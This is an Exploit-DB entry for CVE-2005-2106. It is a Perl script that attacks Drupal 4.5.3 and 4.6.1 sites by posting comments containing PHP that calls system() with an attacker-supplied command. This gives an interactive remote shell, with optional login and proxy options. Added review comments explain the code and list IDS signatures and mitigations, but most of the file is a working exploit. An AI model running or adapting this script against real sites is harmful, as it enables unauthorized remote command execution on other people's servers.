Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit

2005-07-05T00:00:00
ID EDB-ID:1088
Type exploitdb
Reporter dab
Modified 2005-07-05T00:00:00

Description

Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit. CVE-2005-2106. Web-application exploit for the PHP platform.

                                        
                                            #!/usr/bin/perl
# Mon Jul  4 18:19:35 CEST 2005 dab@digitalsec.net
#
# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)
# Hax0r code here, read before execute
#
# Run without arguments to show the help.
#
# BLINK! BLINK! BLINK! BLINK!
#
# Feel free to port to another stupid script language (mIRC,
# python, TCL or orthers), and send to securiteam (AGAIN)
# 
# Theo, this one hasn't been tested in BSD.. yet!
# infohacking: there're a lot of xss in drupal, contact me if you want 
# to program some exploits.
#
# BLINK! BLINK! BLINK! BLINK!
#
#
# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE
# contact me for pricing and offerings.
#
# !dSR: yubiiiiii yeooooooooooo
#
use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

# Autoflush STDOUT so the prompt below is written before the blocking STDIN read.
$| = 1; # ;1 = |$

# Script-wide state filled in by GetOptions and read by druppy()/help().
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$drupal_user,$drupal_pass);
# --host is the only option that is checked for (see the help call below);
# the GetOptions return value in $options is never examined.
my $options = GetOptions (
  'host=s'		     =&gt; \$host, 
  'proxy=s'           =&gt; \$proxy,
  'proxy_user=s'      =&gt; \$proxy_user,
  'proxy_pass=s'      =&gt; \$proxy_pass,
  'drupal_user=s'      =&gt; \$drupal_user,
  'drupal_pass=s'      =&gt; \$drupal_pass,
	'debug'         	 =&gt; \$debug);

# Without --host, print the usage text; help() exits with status 1.
&help unless ($host);

# Interactive prompt: every line read from STDIN is handed to druppy() as one
# command. NOTE(review): the line is not checked for definedness, so reaching
# EOF on STDIN does not appear to end this loop.
while (1){
    print "druppy461\$ ";
    my $cmd = &lt;STDIN&gt;;
    &druppy($cmd);
}
# Not reachable: the loop above has no exit path of its own.
exit (1); # could be replaced with exit(2)


# druppy($cmd): sends one command line to the Drupal site given by $host.
#
# What the code visible here does: optionally logs in (edit[name]/edit[pass]
# POSTed to user/login), fetches $host to collect the comment form's "op"
# button values, then POSTs a comment whose body is a PHP snippet wrapping
# system($cmd) between two "BLAH" marker lines, and echoes the response lines
# found between those markers. It depends on the target accepting PHP in
# comment bodies (edit[format] =&gt; '2'; presumably the PHP input format --
# confirm against the target version), i.e. the DRUPAL-SA-2005-002 condition
# named in the file header.
#
# Defender notes grounded in this code: the User-Agent string set below, a
# comment POST containing a PHP open tag and "system(", and the "BLAH" marker
# lines are all straightforward log/IDS signatures; the mitigation is the
# vendor fix referenced in the header and never granting an untrusted role an
# input format that executes PHP.
#
# Parameters: $cmd -- the raw line read from STDIN (trailing newline removed
#             here). Undef is not rejected.
# Returns:    nothing meaningful; returns early once the second marker line
#             has been seen.
# Reads the file-scope globals $host, $debug, $drupal_user, $drupal_pass,
# $proxy, $proxy_user and $proxy_pass set by GetOptions.
sub druppy {
    chomp (my $cmd = shift);
    # Turn on LWP::Debug tracing when --debug is given.
    LWP::Debug::level('+') if $debug;

    # One cookie jar per run, kept in a PID-named file in the working
    # directory; nothing in this file removes it afterwards.
    my $ua = new LWP::UserAgent(
            cookie_jar=&gt; { file =&gt; "$$.cookie" });   # this is a random feature
    # Deliberately conspicuous User-Agent -- a trivial signature to alert on.
    $ua-&gt;agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");

    # Authenticated mode: log in first (the help text says this is needed
    # when anonymous posting is not allowed).
    if ($drupal_user) {
        my ($mhost, $h);
        # Derive the login URL from $host: with a "?q=" style URL, replace the
        # query with user/login ...
        if ($host =~ /(http:\/\/.*?)\?q=/) {
            $mhost = $1;
            $h = $mhost . "?q=user/login";
        }
        # ... otherwise take the prefix before the first two slashes and
        # append /user/login. NOTE(review): with a non-greedy prefix this
        # captures only up to the first pair of slashes -- check that it
        # yields the intended base URL for the URL shapes in use.
        else { 
            $host =~ /(.*?)\/.*?\//; $mhost =$1;
            $h = $mhost . "/user/login";
        }
        print $h . "\n" if $debug; 
        # Credentials are sent in the clear as ordinary form fields.
        my $req = POST $h,[
            'edit[name]' =&gt; "$drupal_user",
            'edit[pass]' =&gt; "$drupal_pass"
                ];
        print $req-&gt;as_string() if $debug;
        my $res = $ua-&gt;request($req);
        print $res-&gt;content() if $debug;
        # A redirect is taken as a successful login; only a debug message is
        # printed and a failed login is not acted on.
        if ($res-&gt;is_redirect eq 1) {
            print "Logged\n" if $debug;
        }
    }

    # Proxy settings are applied only from this point on; the login request
    # above has already been sent without them.
    $ua-&gt;proxy(['http'] =&gt; $proxy) if $proxy;
    # NOTE(review): "my $req" here declares a new, undefined scalar, so this
    # call is not made on any request object.
    my $req-&gt;proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
    # Fetch the comment form and collect every submit-button value
    # (name="op" value="...") it contains; one POST is made per value below.
    my $res = $ua-&gt;get("$host");
    my $html = $res-&gt;content();
    my @op;
    foreach (split(/\n/,$html)) { 
        if ( m/name="op" value="(.*?)"/){
            push(@op,$1);
        }
    }

    # Number of "BLAH" marker lines seen so far across all responses.
    my $ok = 0;
    foreach my $op (@op) {
        # The comment body is a PHP snippet; $cmd is interpolated into it
        # verbatim. The cid/pid/nid fields are sent empty.
        my $req = POST "$host",[
            'edit[subject]' =&gt; 'test',
            'edit[comment]' =&gt; 
             "&lt;?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\");  php?&gt;",
            'edit[format]' =&gt; '2',    # input format id; presumably the PHP format -- confirm on target
            'edit[cid]' =&gt; "",
            'edit[pid]' =&gt; "",
            'edit[nid]' =&gt; "",
            'op' =&gt; "$op"             # one of the button values collected above
                ];

        print $req-&gt;as_string() if $debug;
        my $res = $ua-&gt;request($req);
        my $html = $res-&gt;content(); 
        print $html if $debug;
        # Echo only the lines strictly between the first and second marker;
        # once the second marker has passed, stop entirely.
        foreach (split(/\n/,$html)) {
            return if $ok gt "1";       # string comparison on the counter
            if (/BLAH/) { $ok++; next }
            print "$_\n" if $ok eq "1";
        }
    }
}


# help(): write the usage text to STDOUT and exit with status 1.
# Called at file scope when --host was not supplied; takes no arguments
# and never returns.
sub help {
    my @usage = (
        "Syntax: ./$0 &lt;url&gt; [options]\n",
        "\t--drupal_user, --drupal_pass  (needed if dont allow anonymous posts)\n",
        "\t--proxy (http), --proxy_user, --proxy_pass\n",
        "\t--debug\n",
        "\nExample\n",
        "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n",
        "\n",
    );
    print @usage;
    exit(1);
}


#sub 0day_solaris {
# please put your code here
#}

# milw0rm.com [2005-07-05]